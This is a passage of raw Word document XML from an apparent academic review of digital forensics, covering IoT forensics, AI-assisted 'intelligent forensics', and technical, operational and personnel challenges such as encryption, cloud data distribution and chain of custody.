        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ezps7odzv0d2" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: Social Media and Forensics</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqyh9jrw2grc" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IoT Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IoT forensics, emerging due to the interconnectivity of electronic devices in IoT systems, addresses the unique challenges these systems pose in digital forensics [13]. Despite offering significant benefits, IoT devices are susceptible to various cyber threats, making IoT forensics crucial for digital investigations [14]. This field grapples with the complexities of handling vast amounts of data ("Big IoT data") generated by IoT devices, which is instrumental in tracing cybercrimes [4]. However, the extraction and preservation of data from IoT devices present challenges due to diverse protocols and formats [15], [16]. Despite these challenges, IoT forensics is a critical trend in the digital forensics domain, offering contextual evidence that is richer than that obtained from conventional systems.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i42wnyyf7gn3" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Artificial intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The integration of Artificial Intelligence (AI) with digital forensics is revolutionizing the field, especially in dealing with the increasing volume and complexity of digital data [24]. AI's ability to handle sophisticated, large-scale problems in real-time addresses the limitations faced by digital forensic investigators, who often struggle with resource and time constraints [25]. This combination has given rise to intelligent forensics, an interdisciplinary approach that enhances the efficiency and credibility of digital investigations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligent forensics, by employing AI technologies like machine learning, improves both the specificity and generality of investigations, taking into account cybercrime patterns. It offers both reactive capabilities, analyzing data post-incident for in-depth insights, and proactive abilities, predicting future threats by assessing past trends [25], [26]. This proactive approach is particularly valuable in predicting and preserving digital resources for evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, intelligent forensics uses a range of techniques, including social network analysis and computational modeling, to lower the time required for evidence extraction [27]. AI's role in managing large datasets is crucial for collecting digital evidence, significantly enhancing the accuracy and reliability of forensic results. This integration marks a dynamic transformation in digital forensics, making it more efficient and effective in extracting valuable digital evidence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_44pfilvb7oyx" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Challenges Facing Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vvwpw5z3p39v" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o4ynsy95ny3n" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The widespread availability of sophisticated encryption tools makes it difficult for forensic experts to conduct cryptanalysis and decrypt data, with approximately 60% of encrypted cases remaining unprocessed [19]. This hinders investigations as criminals can easily hide their activities [18].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brwbu03f8um6" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Volume</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The surge in data volumes, particularly in applications like enterprise resource planning, overwhelms legal systems and forensic investigators, reducing their ability to keep pace with digital threats [20].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ojicrepjnade" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Distributed Nature of Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud computing has led to data and software being stored across multiple geographic locations, diminishing the control and visibility of forensic experts over digital artifacts [19].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w7wa8mcr6wd7" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incompatibility of Forensic Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The diversity in cost, complexity, and functionality of digital forensic tools leads to heterogeneity and incompatibility issues, complicating their integration and usage in investigations [17].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t1o4qfygoh50" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operational challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9ntarwe6bpdi" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Prevention, Response, and Detection Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensics faces difficulties in managing security incidents, especially in cloud environments. Traditional IT systems with on-premises data have established incident management processes, but cloud systems complicate these due to anti-forensics technology used by attackers [17], [21].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rrrbejmi8rmk" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lack of Standardization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A major operational challenge in digital forensics is the absence of standardized procedures and processes, leading to increased complexity in forensic investigations and difficulty in assessing the competency of forensic experts [19].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_65ip1ry2k552" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic Readiness Issues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid advancements in cloud computing require organizations to adapt their IT strategies, often lacking in forensic readiness. This lack of preparedness poses threats to digital forensic operations [22].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ocyo145glarp" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Analysis of Physical Drives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The manual intervention in analyzing physical hard drives, particularly in complex configurations like RAID, presents significant challenges in preserving the integrity of digital artifacts [17].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6ta5sydkh61d" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Personnel related challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sl6ljr2msm0v" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain of Custody Issues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Managing the chain of custody, which involves maintaining a record of the evidence collection point, is particularly challenging in digital environments. Physical control of evidence, crucial in traditional forensics, is problematic in digital contexts due to the nature of digital evidence [7].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m4icq0nzdnbk" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incompatibility and Conflict in Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The lack of unified formal representation of standardized procedures in digital forensics leads to incompatibility and conflict among various forensic tools. This inconsistency can result in errors during the interpretation and analysis of digital artifacts [23].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8l0mf2lppabv" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recording and Knowledge Sharing Difficulties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
